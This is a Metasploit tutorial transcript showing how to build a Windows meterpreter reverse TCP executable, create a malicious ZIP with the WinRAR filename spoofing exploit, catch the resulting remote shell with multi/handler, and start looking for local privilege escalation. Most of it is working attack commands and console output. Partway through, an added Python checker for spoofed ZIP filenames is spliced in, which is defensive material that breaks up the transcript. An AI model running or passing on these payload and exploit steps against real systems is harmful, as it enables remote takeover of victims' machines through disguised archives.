Metasploit Tuto

The document details using msfvenom to generate a Windows meterpreter reverse TCP payload and encoding it in an executable. It then shows using msfconsole to search for encoders and the WinRAR name spoofing exploit. The exploit is used to generate a malicious ZIP file targeting the vulnerability. A multi/handler module is then used to listen for the callback from the payload.


root@root:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.112 lport=4444 -f exe -o /root/Desktop/sk.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the
payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/Desktop/sk.exe
root@root:~# msfconsole
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file


=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

msf5 > search encoder

Matching Modules
================

 #  Name                                                Disclosure Date  Rank       Check  Description
 -  ----                                                ---------------  ----       -----  -----------
 1  encoder/cmd/brace                                                    low        No     Bash Brace Expansion Command Encoder
 2  encoder/cmd/echo                                                     good       No     Echo Command Encoder
 3  encoder/cmd/generic_sh                                               manual     No     Generic Shell Variable Substitution Command Encoder
 4  encoder/cmd/ifs                                                      low        No     Bourne ${IFS} Substitution Command Encoder
 5  encoder/cmd/perl                                                     normal     No     Perl Command Encoder
 6  encoder/cmd/powershell_base64                                        excellent  No     Powershell Base64 Command Encoder
 7  encoder/cmd/printf_php_mq                                            manual     No     printf(1) via PHP magic_quotes Utility Command Encoder
 8  encoder/generic/eicar                                                manual     No     The EICAR Encoder
 9  encoder/generic/none                                                 normal     No     The "none" Encoder
10  encoder/mipsbe/byte_xori                                             normal     No     Byte XORi Encoder
11  encoder/mipsbe/longxor                                               normal     No     XOR Encoder
12  encoder/mipsle/byte_xori                                             normal     No     Byte XORi Encoder
13  encoder/mipsle/longxor                                               normal     No     XOR Encoder
14  encoder/php/base64                                                   great      No     PHP Base64 Encoder
15  encoder/ppc/longxor                                                  normal     No     PPC LongXOR Encoder
16  encoder/ppc/longxor_tag                                              normal     No     PPC LongXOR Encoder
17  encoder/ruby/base64                                                  great      No     Ruby Base64 Encoder
18  encoder/sparc/longxor_tag                                            normal     No     SPARC DWORD XOR Encoder
19  encoder/x64/xor                                                      normal     No     XOR Encoder
20  encoder/x64/xor_dynamic                                              normal     No     Dynamic key XOR Encoder
21  encoder/x64/zutto_dekiru                                             manual     No     Zutto Dekiru
22  encoder/x86/add_sub                                                  manual     No     Add/Sub Encoder
23  encoder/x86/alpha_mixed                                              low        No     Alpha2 Alphanumeric Mixedcase Encoder
24  encoder/x86/alpha_upper                                              low        No     Alpha2 Alphanumeric Uppercase Encoder
25  encoder/x86/avoid_underscore_tolower                                 manual     No     Avoid underscore/tolower
26  encoder/x86/avoid_utf8_tolower                                       manual     No     Avoid UTF8/tolower
27  encoder/x86/bloxor                                                   manual     No     BloXor - A Metamorphic Block Based XOR Encoder
28  encoder/x86/bmp_polyglot                                             manual     No     BMP Polyglot
29  encoder/x86/call4_dword_xor                                          normal     No     Call+4 Dword XOR Encoder
30  encoder/x86/context_cpuid                                            manual     No     CPUID-based Context Keyed Payload Encoder
31  encoder/x86/context_stat                                             manual     No     stat(2)-based Context Keyed Payload Encoder
32  encoder/x86/context_time                                             manual     No     time(2)-based Context Keyed Payload Encoder
33  encoder/x86/countdown                                                normal     No     Single-byte XOR Countdown Encoder
34  encoder/x86/fnstenv_mov                                              normal     No     Variable-length Fnstenv/mov Dword XOR Encoder
35  encoder/x86/jmp_call_additive                                        normal     No     Jump/Call XOR Additive Feedback Encoder
36  encoder/x86/nonalpha                                                 low        No     Non-Alpha Encoder
37  encoder/x86/nonupper                                                 low        No     Non-Upper Encoder
38  encoder/x86/opt_sub                                                  manual     No     Sub Encoder (optimised)
39  encoder/x86/service                                                  manual     No     Register Service
40  encoder/x86/shikata_ga_nai                                           excellent  No     Polymorphic XOR Additive Feedback Encoder
41  encoder/x86/single_static_bit                                        manual     No     Single Static Bit
42  encoder/x86/unicode_mixed                                            manual     No     Alpha2 Alphanumeric Unicode Mixedcase Encoder
43  encoder/x86/unicode_upper                                            manual     No     Alpha2 Alphanumeric Unicode Uppercase Encoder
44  encoder/x86/xor_dynamic                                              normal     No     Dynamic key XOR Encoder
45  exploit/windows/browser/ms08_053_mediaencoder       2008-09-09       normal     No     Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
46  exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro        2010-06-08       great      No     HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
47  exploit/windows/http/novell_messenger_acceptlang    2006-04-13       average    No     Novell Messenger Server 2.0 Accept-Language Overflow

msf5 > search winrar

Matching Modules
================

 #  Name                                                Disclosure Date  Rank       Check  Description
 -  ----                                                ---------------  ----       -----  -----------
 1  exploit/windows/fileformat/winrar_ace               2019-02-05       excellent  No     RARLAB WinRAR ACE Format Input Validation Remote Code Execution
 2  exploit/windows/fileformat/winrar_name_spoofing     2009-09-28       excellent  No     WinRAR Filename Spoofing

msf5 > Interrupt: use the 'exit' command to quit
msf5 > exploit/windows/fileformat/winrar_name_spoofing
[-] Unknown command: exploit/windows/fileformat/winrar_name_spoofing.
This is a module we can load. Do you want to use exploit/windows/fileformat/winrar_name_spoofing? [y/N] Interrupt: use the 'exit' command to quit
msf5 > exploit/windows/fileformat/winrar_name_spoofing
[-] Unknown command: exploit/windows/fileformat/winrar_name_spoofing.
This is a module we can load. Do you want to use exploit/windows/fileformat/winrar_name_spoofing? [y/N] y
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(windows/fileformat/winrar_name_spoofing) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set FILENAME samk.zip
FILENAME => samk.zip
msf5 exploit(windows/fileformat/winrar_name_spoofing) > exploit

[*] Creating 'samk.zip' file...
[+] samk.zip stored at /root/.msf4/local/samk.zip
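Archive name spoofing of the kind the module above targets works because the name an archiver displays comes from the ZIP central directory while the name it extracts comes from the local file header. The checker below is an added example, not part of the original transcript or of Metasploit: it reads both name tables from a ZIP and reports every entry where they disagree, which is the check a mail gateway or sandbox would run on an inbound archive. It builds its own constructed sample archives inline and needs only the Python standard library.

```python
"""Added example, not from the original transcript: flag ZIP archives whose
local-file-header filenames disagree with their central-directory filenames,
the inconsistency that archive name spoofing relies on."""
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"


def central_directory_names(data: bytes) -> dict:
    """Map each entry's local-header offset to its central-directory name."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {zi.header_offset: zi.filename for zi in zf.infolist()}


def local_header_name(data: bytes, offset: int) -> str:
    """Read the filename stored in the local file header at `offset`."""
    if data[offset:offset + 4] != LOCAL_HEADER_SIG:
        raise ValueError("no local file header at offset %d" % offset)
    # The filename length lives at byte 26 of the 30-byte fixed header.
    (name_len,) = struct.unpack_from("<H", data, offset + 26)
    return data[offset + 30:offset + 30 + name_len].decode("cp437")


def find_name_mismatches(data: bytes) -> list:
    """Return (central_name, local_name) pairs whose names differ."""
    mismatches = []
    for offset, central_name in central_directory_names(data).items():
        local_name = local_header_name(data, offset)
        if local_name != central_name:
            mismatches.append((central_name, local_name))
    return mismatches


def build_sample(spoofed: bool) -> bytes:
    """Constructed test input: a one-entry stored ZIP. When `spoofed` is True
    the local-header name is rewritten (same length) so the two names differ."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("notes.txt", b"constructed sample content")
    data = bytearray(buf.getvalue())
    if spoofed:
        # The first local header is at offset 0; its 9-byte name starts at byte 30.
        data[30:39] = b"notes.exe"
    return bytes(data)


if __name__ == "__main__":
    for spoofed in (False, True):
        print("spoofed=%s -> %s" % (spoofed, find_name_mismatches(build_sample(spoofed))))
```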
msf5 exploit(windows/fileformat/winrar_name_spoofing) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.112    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.112:4444
[*] Sending stage (179779 bytes) to 192.168.0.111
[*] Meterpreter session 1 opened (192.168.0.112:4444 -> 192.168.0.111:1849) at 2019-07-26 08:14:50 -0400
[*] Sending stage (179779 bytes) to 192.168.0.111

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

 #  Name                                                Disclosure Date  Rank       Check  Description
 -  ----                                                ---------------  ----       -----  -----------
 1  post/multi/recon/local_exploit_suggester                             normal     No     Multi Recon Local Exploit Suggester

msf5 exploit(multi/handler) > post/multi/recon/local_exploit_suggester
[-] Unknown command: post/multi/recon/local_exploit_suggester.
This is a module we can load. Do you want to use post/multi/recon/local_exploit_suggester? [y/N] y
msf5 post(multi/recon/local_exploit_suggester) >
